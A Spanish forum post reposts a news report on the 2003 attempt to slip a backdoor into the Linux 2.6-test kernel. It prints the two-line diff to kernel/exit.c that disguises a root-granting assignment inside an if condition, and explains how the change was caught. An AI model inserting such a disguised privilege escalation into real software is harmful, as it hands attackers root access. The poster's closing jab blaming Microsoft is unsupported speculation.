Noticia sacada de hispasec
Un análisis rutinario automático del código fuente de la última versióndel kernel Linux (2.6-test) descubre el intento de implantar una puertatrasera en dicho sistema operativo.
Linux es un sistema operativo Open Source en boga, cuya popularidadcrece día a día.
La última versión del kernel Linux (2.6 test), aún en desarrollo,experimentó un intento de implantarle una puerta trasera, que permitiríaa un atacante local obtener privilegios de administrador o "root" conla ejecución de una función aparentemente inocua y de uso normal.
El fichero alterado fue "kernel/exit.c", y constaba de apenas dos líneasde código fuente:
- –- GOOD 2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
- if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
- retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;
<<<<<
La puerta trasera, muy inteligente, explota el hecho de que el lenguajede programación C permite asignaciones en lugares insospechados, comodentro de una sentencia "if". El efecto neto de este cambio seríaobtener privilegios de administrador o "root" si se invoca la función"sys_wait4()" con los parámetros apropiados ("__WCLONE" y "__WALL"). Ala vista del cambio, el atacante ha mostrado cierta destreza para lograrque el código no sea patentemente malicioso.
El cambio se realizó en la réplica CVS que reside en el servidor"kernel.bkbits.net". Dicha réplica se obtiene automáticamente a travésde los fuentes oficiales de Linux, gestionados mediante la herramienta"BitKeeper". La alteración afectó a la réplica, no a los fuentesoriginales.
Aunque el cambio fue detectado de forma automática por laherramientas de exportación BitKeeper->CVS, el incidente servirá comollamada de atención y para desplegar nuevas tecnologías, como elrequerir una firma digital autorizada para poder realizar cambios en elkernel. Dado que la exportación BitKeeper->CVS se realiza de formadiaria, el fichero alterado se detectó y eliminó en menos de 24 horas.
Para los usuarios de entornos Linux, el mejor consejo que se puede dares descargar las actualizaciones desde fuentes de confianza y verificar,si existen, sus firmas digitales.
(la verdad despues de esto y de comprometer 4 servers del proyecto Debian GNU/linux ya nose que más puede pasar.... quiebra de redhat xD, pa mi k esto es obra de los secuaces de M$)
Un saludo!
).JPG)
.JPG)
